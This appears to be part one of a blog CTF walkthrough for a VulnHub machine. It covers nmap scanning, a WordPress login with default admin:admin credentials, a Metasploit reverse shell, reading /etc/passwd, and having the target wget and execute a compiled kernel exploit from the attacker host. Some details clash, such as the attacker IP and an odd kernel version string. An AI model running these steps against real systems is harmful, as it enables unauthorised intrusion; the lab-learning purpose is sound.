In this article, we will solve a Capture the Flag (CTF) challenge that was posted on VulnHub by Vishal Biswas. Per the description given by the author, this is an easy-level CTF to learn some privilege escalation techniques.
The target of this CTF is to get the root access of the target machine and read the two flag files. Prerequisites would be having some knowledge of Linux commands and ability to run some basic penetration testing tools.
VulnHub is a well-known website for security researchers that aim to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable machines from this website and try to exploit them. I highly suggest attempting them, as it is a good way to sharpen your skills and learn new techniques in a safe environment.
You can check my previous articles for more CTF challenges. I have also provided a downloadable URL for this CTF; you can download the machine and run it on VirtualBox. The torrent downloadable URL is also available for this VM and has been added in the reference section of this article.
Please note: For all of these machines, I have used Oracle VirtualBox to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.
The summary of the steps involved in solving this CTF is given below.
- Getting the target machine IP address
- Scanning open ports by using the nmap scanner
- Enumerating WordPress website
- Exploiting through Metasploit and getting the Meterpreter connection
- Enumerating the target system with a limited shell
- Exploiting local privilege escalation vulnerability for getting the root
After running the downloaded virtual machine in VirtualBox, the machine will automatically be assigned an IP address from the network DHCP, and it will be visible on the login screen. The target machine IP address can be seen in the following screenshot: [CLICK IMAGES TO ENLARGE]
The target machine IP address is 192.168.1.12 and I will be using 192.168.1.14 as an attacker IP address.
Note: The target machine IP address may be different in your case, as it is assigned by the network DHCP.
For this machine, we do not need to run the netdiscover command to get the target IP address as it is automatically assigned and displayed on the screen.
Now we have the target machine IP address, the next step is to find the open ports and services available on the machine. I ran an nmap full-port scan on the target machine. The results can be seen below:
Command used: nmap -A 192.168.1.12 -A
The output of the nmap command shows that the port numbers 22 and 80 were identified as open on the target machine. From the nmap results, we also found other details about the services running on those ports, such as the SSH version number and Apache version.
We also discovered that there is a WordPress website running on port 80. As we all know, WordPress websites are a host to many vulnerabilities if not upgraded on regular basis. In the next step, we will be checking the WordPress website for any loopholes.
Let’s start by running the target machine IP address on the browser and exploring the website. We can see this in the following screenshot.
The WordPress website is running on the target machine but there was some problem in the website design. I set up Burp Suite to identify the issue and see the complete site:
In the above screenshot, we can see that the site is redirecting to another domain name. I configured my machine by modifying the /etc/hosts file to accept “ck” to be used in place of the IP address in the target machine URL. The screenshot for this is given below:
Command used: cat >> /etc/hosts
As we can see above, we have configured the attacker machine as per the domain name. Let’s open the target machine URL on the browser with the updated domain name:
We can see that that website is working properly on the browser. As this is a WordPress website, let’s try to see the admin login panel. It can be seen in the following screenshot:
We can see that the admin login page is available on the target machine. I tried my luck with some of the default login credentials for WordPress, as website owners sometimes forget to change the default credentials. The result can be seen below:
The default credentials worked and now we have access to the admin panel of the WordPress website. The default credentials that were used in the above step are given below:
- Username: admin
- Password: admin
Now we have the admin account access for the website, but our target is to gain access to the target machine through it. In the next step, we will be using Metasploit to try a few exploits on the target machine.
As Metasploit is preconfigured on the Kali machine, we don’t have to install it. I simply run it by using the msfconsole command:
- use exploit/unix/webapp/wp_admin_shell_upload
We can see Metasploit has started with very nice banner message on the screen.
I used the most common exploit, which is generally used to take the WordPress website reverse shell. However, it only works if you have the valid WordPress credentials. As we know from the previous step, our target machine is using default credentials (admin:admin). Now, let’s configure rest of the things to launch the exploit.
I used the show options command to see the required settings for this exploit. This can be seen below:
- show options
- set RHOSTS 192.168.1.12
- set USERNAME admin
- set PASSWORD admin
We can see that we need to fill out details of the target host and username password of the admin panel of the WordPress website to be exploited. Let’s try to understand the sequence of marked points in the above screenshot.
- This command was used to see the required details to use this exploit. show options
We needed to fill the following details: RHOST, username and password
- In this step, we entered the target machine IP address where the website is hosted. set RHOSTS 192.168.1.12
- This command was used to set up the username as admin: set USERNAME admin
- This command was used to set the password as admin: set PASSWORD admin
We have entered the details to configure this exploit. Let us verify the details by using the show options command:
- show options
Above, we can see that all the required details have been provided by us and the exploit is configured to be launched on the target machine WordPress website. Let’s run the exploit to get the shell access.
We used the exploit command to run the exploit. The exploit was successfully run on the target machine, and we got the Meterpreter reverse shell of the target machine.
In the next step, we will enumerate it further.
So far, we’ve got the Meterpreter reverse connection of our target machine. Now we’ll see which user access we have on the target machine. Before checking it, let’s run the shell command, which will give us the Bash shell access. It can be seen in the following screenshot:
- uname -a
- cat /etc/passwd
In the above screenshot, we can see that I used the id command to check the user type on the target machine. We have the limited shell access on the target machine as “www-data”, which is the least privileged user, and our target is to get the root access. So, I tried to enumerate the server operating system version and the kernel version for any possibilities of identifying a vulnerable version of these utilities.
I used two commands for this purpose, which can be seen in the highlighted area of the above screenshot. The command output shows that the operating system is running an older version of the kernel. The version is 18.104.22.168-generic.
In the previous step, we have enumerated the older version of the kernel. Next, I quickly searched for a local exploit for the identified kernel version and found an exploit on the Exploit-DB website:
We can see in the above screenshot that the kernel version is vulnerable for the local privilege escalation vulnerability. By successfully running this exploit on the target machine, we can escalate the user privilege to root.
I started analyzing the prerequisites for the exploit to be run as a limited shell on the target machine. I found that the exploit needs to be compiled before executing it, as it is written in C/C++, but the compiler is not available on our target machine. I verified this by executing the gcc command on the target machine. The output can be seen below:
Command used << gcc >>
We got a “not found” message on the target machine. It means we have to first download the exploit on our attacker machine, where we will have to compile it and then move it to our target system so that we can execute it. In order to achieve this, we ran following commands in a sequence:
As you can see, first we used the wget utility to download the exploit in the html directory on our system. The name of the downloaded exploit file is “47163.c”. After that, we used the gcc utility to compile the exploit. The command used to compile the exploit is given below:
After this, we used the following command to start the Apache service. We will now download this compiled exploit on the target machine from our system.
Now, let’s download the executable file “a.out” from our machine to the target machine. This can be seen in the following screenshot:
- cd /tmp
- wget 192.168.1.13/a.out
- chmod +x a.out
As we can see, I first changed the current directory to the “/tmp/” directory so that we can read and write files. After that, I used the wget utility to download the complied exploit on the target system.
As we have to execute it, we give the executable permission to it. I used the chmod +x command to give the executable permission to our exploit file. After that, we ran it on the target machine. Unfortunately, the target system blocked the execution.
I started exploring other files and directories on the target system to get the information which could help us to get the root access.
While exploring the files and directories on the system, I found our first flag in the “home” directory. It is a user flag and can be seen in the following screenshot.
In the above screenshot, we can see that we have got the local user flag, but our target is to get the root access. This message is also displayed on the screen when we read the flag file.
So far, we have found one user flag on the system and tried the possibilities of exploiting WordPress installation on the target machine to get into the system, but our attempt failed. In the next article, part 2 of this CTF, we will complete the rest of the steps that involve gaining the root access of the target machine and reading the flag file.
Until then, I encourage you to try to finish this CTF! There are enough hints given in the above steps.